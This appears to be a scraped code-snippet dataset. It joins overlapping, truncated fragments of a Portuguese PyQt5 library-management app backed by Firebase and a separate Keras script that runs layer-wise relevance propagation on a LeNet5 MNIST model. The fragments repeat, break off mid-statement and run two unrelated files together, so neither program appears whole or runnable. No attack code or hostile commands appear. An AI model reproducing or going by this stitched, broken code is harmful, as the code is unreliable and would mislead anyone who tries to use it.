\"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId':", "'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self):", "self.adm_livro.setupUi(self.stack1) self.cadastro_livro = 
Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4)", ": self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self):", "QApplication import sys from Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro", "PyQt5 from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication", "Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow", "self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3", "import Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import", "Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self,", "self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result", "QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication import sys from Telas_Usuario.tela_de_login import Ui_Tela_Login", "self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) 
self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self, parent=None):", ": self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result = self.remover_livroo.BuscaISBN_2.text()", "cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora'", "self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self, parent=None): super(Main, self).__init__(parent)", "from PyQt5.QtCore import pyqtSlot from firebase import firebase firebaseConfig = { 'apiKey': \"<KEY>\",", "= QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5 =" ]
[ "optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile = open('relfile.csv', 'w') outs = get_layer_outs_new(model,", "print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters (stored in JSON file)", "+ ',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1))", "file) file_content = json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model", "Compile the model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile", "Rinit = ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in range(len(X_test)): #100", "rel_row = '' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) +", "out_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) +", "utils import load_MNIST from utils import get_layer_outs_new from utils import filter_val_set from utils", "before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile = open('relfile.csv', 'w')", "out_row += str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1))", "X_test) preds = model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer()", "prediction accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output layer for analysis Rs = []", "range(outs[-3].shape[-1]): out_data = [] for j in range(10): #100 inputs out_data.append(Rs[j][0][i]) plt.clf() plt.plot(range(10),", "# plt.plot(range(10), rel_data) # 
plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]): out_data = []", "accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output layer for analysis Rs = [] for", "load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder = 'experiments' selected_class = 0 X_train, Y_train,", "X_test, Y_test = load_MNIST(channel_first=False) img_rows, img_cols = 28, 28 X_test, Y_test = filter_val_set(selected_class,", "= load_MNIST(channel_first=False) img_rows, img_cols = 28, 28 X_test, Y_test = filter_val_set(selected_class, X_test, Y_test)", "outfile = open('outfile.csv', 'w') relfile = open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test) preds", "lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit = ypred*mask R_inp, R_all", "rel_row += str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) +", "',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() # plt.plot(range(10),", "[] out_row = '' rel_row = '' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i])", "0 X_train, Y_train, X_test, Y_test = load_MNIST(channel_first=False) img_rows, img_cols = 28, 28 X_test,", "i in range(outs[-3].shape[-1]): out_data = [] for j in range(10): #100 inputs out_data.append(Rs[j][0][i])", "Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class, 7)) #layer print(relevant_neurons) json_file", "#out_data = [] #rel_data = [] out_row = '' rel_row = '' for", "Rs.append(R_all[-1]) for i in range(len(X_test)): #100 inputs #out_data = [] #rel_data = []", "model_from_json from utils import load_MNIST from utils import get_layer_outs_new from utils import filter_val_set", "read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction 
accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output layer for", "from lrp_toolbox.model_io import read experiment_folder = 'experiments' selected_class = 0 X_train, Y_train, X_test,", "selected_class, 7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters (stored", "''' for i in range(outs[-3].shape[-1]): out_data = [] for j in range(10): #100", "model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile = open('relfile.csv', 'w') outs =", "# drop softnax output layer for analysis Rs = [] for inp in", "i in range(len(X_test)): #100 inputs #out_data = [] #rel_data = [] out_row =", "X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit =", "as plt from keras.models import load_model, model_from_json from utils import load_MNIST from utils", "analysis Rs = [] for inp in X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask", "np import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt from keras.models import", "load_model, model_from_json from utils import load_MNIST from utils import get_layer_outs_new from utils import", "relfile.close() # plt.clf() # plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for", "= json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model before using", "= open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters (stored in JSON file) file_content =", "R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in range(len(X_test)): #100 inputs #out_data = []", "# plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]): out_data = [] for j in", "np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit = 
ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for", "from utils import load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder = 'experiments' selected_class =", "lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in range(len(X_test)): #100 inputs #out_data = [] #rel_data =", "'' rel_row = '' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j])", "28, 28 X_test, Y_test = filter_val_set(selected_class, X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5',", "str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row)", "outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() # plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) #", "using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile = open('relfile.csv', 'w') outs", "in JSON file) file_content = json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile", "open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt')", "= [] for j in range(10): #100 inputs out_data.append(Rs[j][0][i]) plt.clf() plt.plot(range(10), out_data) plt.savefig(\"./plots/rel\"+str(i)+\".png\")", "plt from keras.models import load_model, model_from_json from utils import load_MNIST from utils import", "import load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder = 'experiments' selected_class = 0 X_train,", "R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in range(len(X_test)): #100 inputs #out_data =", "= 
np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit = ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1])", "from utils import filter_val_set from utils import load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder", "out_row = '' rel_row = '' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row", "= open('outfile.csv', 'w') relfile = open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test) preds =", "<gh_stars>0 import numpy as np import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as", "layer for analysis Rs = [] for inp in X_test: ypred = lrpmodel.forward(np.expand_dims(inp,", "JSON file) file_content = json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the", "+ ',' rel_row += str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1)) + ',' +", "+= str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n'", "#layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters (stored in JSON", "import matplotlib.pyplot as plt from keras.models import load_model, model_from_json from utils import load_MNIST", "',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) +", "str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf()", "import filter_val_set from utils import load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder = 'experiments'", "+= str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1)) +", "import numpy as np import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt", "+ 
str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n'", "json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model before using model.compile(loss='categorical_crossentropy',", "from keras.models import load_model, model_from_json from utils import load_MNIST from utils import get_layer_outs_new", "inp in X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1", "output layer for analysis Rs = [] for inp in X_test: ypred =", "the model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile =", "',' out_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1))", "'\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() # plt.plot(range(10), out_data) # plt.plot(range(10), rel_data)", "= get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction", "'w') relfile = open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel", "model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile = open('relfile.csv',", "'\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close()", "%(experiment_folder, 'LeNet5', 8, #rn selected_class, 7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read", "lrpmodel.drop_softmax_output_layer() # drop softnax output layer for analysis Rs = [] for inp", "= 0 X_train, Y_train, X_test, Y_test = 
load_MNIST(channel_first=False) img_rows, img_cols = 28, 28", "[] for j in range(10): #100 inputs out_data.append(Rs[j][0][i]) plt.clf() plt.plot(range(10), out_data) plt.savefig(\"./plots/rel\"+str(i)+\".png\") '''", "'experiments' selected_class = 0 X_train, Y_train, X_test, Y_test = load_MNIST(channel_first=False) img_rows, img_cols =", "read experiment_folder = 'experiments' selected_class = 0 X_train, Y_train, X_test, Y_test = load_MNIST(channel_first=False)", "# 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output layer for analysis Rs", "plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]): out_data", "= 28, 28 X_test, Y_test = filter_val_set(selected_class, X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder,", "for i in range(len(X_test)): #100 inputs #out_data = [] #rel_data = [] out_row", "in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j]) +", "model.load_weights('neural_networks/LeNet5.h5') # Compile the model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv',", "for inp in X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] =", "experiment_folder = 'experiments' selected_class = 0 X_train, Y_train, X_test, Y_test = load_MNIST(channel_first=False) img_rows,", "ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit = ypred*mask", "= lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in range(len(X_test)): #100 inputs #out_data = [] #rel_data", "mpl mpl.use('Agg') import matplotlib.pyplot as plt from keras.models import load_model, model_from_json from utils", 
"img_rows, img_cols = 28, 28 X_test, Y_test = filter_val_set(selected_class, X_test, Y_test) relevant_neurons =", "json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model before using model.compile(loss='categorical_crossentropy', optimizer='adam',", "8, #rn selected_class, 7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras model", "str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row", "from utils import load_MNIST from utils import get_layer_outs_new from utils import filter_val_set from", "# Compile the model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w')", "'txt') # 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output layer for analysis", "import get_layer_outs_new from utils import filter_val_set from utils import load_layerwise_relevances from lrp_toolbox.model_io import", "as mpl mpl.use('Agg') import matplotlib.pyplot as plt from keras.models import load_model, model_from_json from", "metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile = open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test)", "import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt from keras.models import load_model,", "str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ',' +", "open('outfile.csv', 'w') relfile = open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test) preds = model.predict(X_test)", "axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit = ypred*mask R_inp, R_all =", "range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j]) + ','", "= [] for 
inp in X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred)", "relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class, 7)) #layer print(relevant_neurons) json_file =", "= 'experiments' selected_class = 0 X_train, Y_train, X_test, Y_test = load_MNIST(channel_first=False) img_rows, img_cols", "[] #rel_data = [] out_row = '' rel_row = '' for j in", "str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() # plt.plot(range(10), out_data) #", "load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class, 7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r')", "plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]): out_data = [] for", "in range(outs[-3].shape[-1]): out_data = [] for j in range(10): #100 inputs out_data.append(Rs[j][0][i]) plt.clf()", "#100 inputs #out_data = [] #rel_data = [] out_row = '' rel_row =", "import load_MNIST from utils import get_layer_outs_new from utils import filter_val_set from utils import", "keras.models import load_model, model_from_json from utils import load_MNIST from utils import get_layer_outs_new from", "'r') #Read Keras model parameters (stored in JSON file) file_content = json_file.read() json_file.close()", "ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in range(len(X_test)): #100 inputs #out_data", "= [] out_row = '' rel_row = '' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i])", "for i in range(outs[-3].shape[-1]): out_data = [] for j in range(10): #100 inputs", "get_layer_outs_new from utils import filter_val_set from utils import load_layerwise_relevances from lrp_toolbox.model_io import read", "load_MNIST(channel_first=False) img_rows, img_cols = 28, 28 X_test, Y_test = 
filter_val_set(selected_class, X_test, Y_test) relevant_neurons", "as np import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt from keras.models", "#Read Keras model parameters (stored in JSON file) file_content = json_file.read() json_file.close() model", "= [] #rel_data = [] out_row = '' rel_row = '' for j", "= '' rel_row = '' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row +=", "+= str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ','", "utils import load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder = 'experiments' selected_class = 0", "X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class, 7)) #layer print(relevant_neurons)", "= model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile", "out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]): out_data =", "= filter_val_set(selected_class, X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class, 7))", "filter_val_set(selected_class, X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class, 7)) #layer", "out_data = [] for j in range(10): #100 inputs out_data.append(Rs[j][0][i]) plt.clf() plt.plot(range(10), out_data)", "for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ',' rel_row +=", "softnax output layer for analysis Rs = [] for inp in X_test: ypred", "= ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) 
Rs.append(R_all[-1]) for i in range(len(X_test)): #100 inputs", "1 Rinit = ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in range(len(X_test)):", "in range(len(X_test)): #100 inputs #out_data = [] #rel_data = [] out_row = ''", "= load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class, 7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json',", "model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])", "'' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ',' rel_row", "X_train, Y_train, X_test, Y_test = load_MNIST(channel_first=False) img_rows, img_cols = 28, 28 X_test, Y_test", "7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters (stored in", "utils import filter_val_set from utils import load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder =", "in X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit", "99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output layer for analysis Rs =", "str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1)) + ','", "lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output", "= lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit = ypred*mask R_inp,", "= '' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ','", "inputs #out_data = [] #rel_data 
= [] out_row = '' rel_row = ''", "numpy as np import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt from", "#rel_data = [] out_row = '' rel_row = '' for j in range(outs[-3].shape[-1]):", "',' rel_row += str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1))", "rel_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close()", "# plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]):", "range(len(X_test)): #100 inputs #out_data = [] #rel_data = [] out_row = '' rel_row", "+ ',' out_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row +=", "outfile.close() relfile.close() # plt.clf() # plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") '''", "+= str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() #", "plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]): out_data = [] for j in range(10):", "model parameters (stored in JSON file) file_content = json_file.read() json_file.close() model = model_from_json(file_content)", "= open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt',", "matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt from keras.models import load_model, model_from_json", "file_content = json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model before", "[] for inp in X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)]", "j in 
range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j])", "plt.clf() # plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in", "open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters (stored in JSON file) file_content = json_file.read()", "matplotlib.pyplot as plt from keras.models import load_model, model_from_json from utils import load_MNIST from", "#rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j]) + ',' out_row +=", "from utils import get_layer_outs_new from utils import filter_val_set from utils import load_layerwise_relevances from", "+ '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() # plt.plot(range(10), out_data) # plt.plot(range(10),", "28 X_test, Y_test = filter_val_set(selected_class, X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8,", "mpl.use('Agg') import matplotlib.pyplot as plt from keras.models import load_model, model_from_json from utils import", "Y_train, X_test, Y_test = load_MNIST(channel_first=False) img_rows, img_cols = 28, 28 X_test, Y_test =", "#rn selected_class, 7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters", "import read experiment_folder = 'experiments' selected_class = 0 X_train, Y_train, X_test, Y_test =", "Rs = [] for inp in X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask =", "mask[:,np.argmax(ypred)] = 1 Rinit = ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i", "'w') outs = get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') #", "relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() # 
plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\")", "for analysis Rs = [] for inp in X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0))", "model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() # drop softnax", "load_MNIST from utils import get_layer_outs_new from utils import filter_val_set from utils import load_layerwise_relevances", "outs = get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16%", "filter_val_set from utils import load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder = 'experiments' selected_class", "relfile = open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel =", "model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile =", "get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction accuracy", "preds = 